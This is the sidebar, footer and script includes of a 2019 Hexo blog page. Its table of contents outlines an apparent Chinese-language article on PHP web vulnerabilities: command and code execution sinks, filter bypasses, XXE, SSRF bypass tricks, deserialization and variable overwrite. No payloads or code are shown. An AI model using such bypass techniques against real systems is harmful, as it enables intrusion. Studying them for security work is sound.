        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#命令执行"><span class="nav-number">1.</span> <span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#system"><span class="nav-number">1.0.1.</span> <span class="nav-text">system</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#exec"><span class="nav-number">1.0.2.</span> <span class="nav-text">exec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shell-exec-gt"><span class="nav-number">1.0.3.</span> <span class="nav-text">shell_exec ==&gt;``</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#pcntl-exec"><span class="nav-number">1.0.4.</span> <span class="nav-text">pcntl_exec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#popen"><span class="nav-number">1.0.5.</span> <span class="nav-text">popen</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#proc-open"><span class="nav-number">1.0.6.</span> <span class="nav-text">proc_open</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#passthru"><span class="nav-number">1.0.7.</span> <span class="nav-text">passthru</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bypass"><span class="nav-number">1.1.</span> <span class="nav-text">bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#OOB带外"><span class="nav-number">1.1.1.</span> <span class="nav-text">OOB带外</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#编码绕过"><span class="nav-number">1.1.2.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#关键字的绕过"><span class="nav-number">1.1.3.</span> <span class="nav-text">关键字的绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#拼接绕过"><span class="nav-number">1.1.4.</span> <span class="nav-text">拼接绕过</span></a></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#代码执行"><span class="nav-number">2.</span> <span class="nav-text">代码执行</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#eval"><span class="nav-number">2.1.</span> <span class="nav-text">eval</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#assert"><span class="nav-number">2.2.</span> <span class="nav-text">assert</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#preg-replace"><span class="nav-number">2.3.</span> <span class="nav-text">preg_replace</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#call-user-func"><span class="nav-number">2.4.</span> <span class="nav-text">call_user_func</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#call-user-func-array"><span class="nav-number">2.5.</span> <span class="nav-text">call_user_func_array</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#array-map"><span class="nav-number">2.6.</span> <span class="nav-text">array_map</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#array-filter"><span class="nav-number">2.7.</span> <span class="nav-text">array_filter</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#create-function"><span class="nav-number">2.8.</span> <span class="nav-text">create_function</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#no-1"><span class="nav-number">2.8.1.</span> <span class="nav-text">no.1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#no-2"><span class="nav-number">2.8.2.</span> <span class="nav-text">no.2</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ob-start"><span class="nav-number">2.9.</span> <span class="nav-text">ob_start</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#usort-uasort"><span class="nav-number">2.10.</span> <span class="nav-text">usort/uasort</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XXE"><span class="nav-number">3.</span> <span class="nav-text">XXE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DOMDocument"><span class="nav-number">3.1.</span> <span class="nav-text">DOMDocument</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SimpleXMLElement"><span class="nav-number">3.2.</span> <span class="nav-text">SimpleXMLElement</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#simplexml-load-string"><span class="nav-number">3.3.</span> <span class="nav-text">simplexml_load_string</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF"><span class="nav-number">4.</span> <span class="nav-text">SSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#curl-exec"><span class="nav-number">4.1.</span> <span class="nav-text">curl_exec</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#file-get-contents"><span class="nav-number">4.2.</span> <span class="nav-text">file_get_contents</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fsocksopen"><span class="nav-number">4.3.</span> <span class="nav-text">fsocksopen</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bypass-1"><span class="nav-number">4.4.</span> <span class="nav-text">bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#IP转换"><span class="nav-number">4.4.1.</span> <span class="nav-text">IP转换</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#url绕过"><span class="nav-number">4.4.2.</span> <span class="nav-text">url绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#filter-var"><span class="nav-number">4.4.3.</span> <span class="nav-text">filter_var</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#parse-url"><span class="nav-number">4.4.4.</span> <span class="nav-text">parse_url</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#no-1-遇到-会返回flase"><span class="nav-number">4.4.4.1.</span> <span class="nav-text">no.1 遇到///会返回flase</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#no-2-遇到-把data当作path"><span class="nav-number">4.4.4.2.</span> <span class="nav-text">no.2 遇到//把data当作path</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#no-3-遇到非法字符自动转为下划线"><span class="nav-number">4.4.4.3.</span> <span class="nav-text">no.3 遇到非法字符自动转为下划线_</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#no-4-解析host"><span class="nav-number">4.4.4.4.</span> <span class="nav-text">no.4 解析host</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#libcurl和parse-url的解析差异"><span class="nav-number">4.4.5.</span> <span class="nav-text">libcurl和parse_url的解析差异</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#302跳转"><span class="nav-number">4.4.6.</span> <span class="nav-text">302跳转</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#测试"><span class="nav-number">4.4.6.1.</span> <span class="nav-text">测试</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反序列化"><span class="nav-number">5.</span> <span class="nav-text">反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#魔术方法"><span class="nav-number">5.1.</span> <span class="nav-text">魔术方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phar"><span class="nav-number">5.2.</span> <span class="nav-text">phar</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#session中的反序列化"><span class="nav-number">5.3.</span> <span class="nav-text">session中的反序列化</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#变量覆盖"><span class="nav-number">6.</span> <span class="nav-text">变量覆盖</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#extract"><span class="nav-number">6.1.</span> <span class="nav-text">extract</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">6.2.</span> <span class="nav-text">$</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#parse-str"><span class="nav-number">6.3.</span> <span class="nav-text">parse_str</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#全局变量注册"><span class="nav-number">6.4.</span> <span class="nav-text">全局变量注册</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#import-request-variables"><span class="nav-number">6.5.</span> <span class="nav-text">import_request_variables()</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#无参数函数"><span class="nav-number">7.</span> <span class="nav-text">无参数函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#超全局变量-ENV"><span class="nav-number">7.1.</span> <span class="nav-text">超全局变量$_ENV</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#getallheaders"><span class="nav-number">7.2.</span> <span class="nav-text">getallheaders</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#配置函数"><span class="nav-number">8.</span> <span class="nav-text">配置函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#session"><span class="nav-number">8.1.</span> <span class="nav-text">session</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#读写文件"><span class="nav-number">9.</span> <span class="nav-text">读写文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">10.</span> <span class="nav-text">参考链接</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
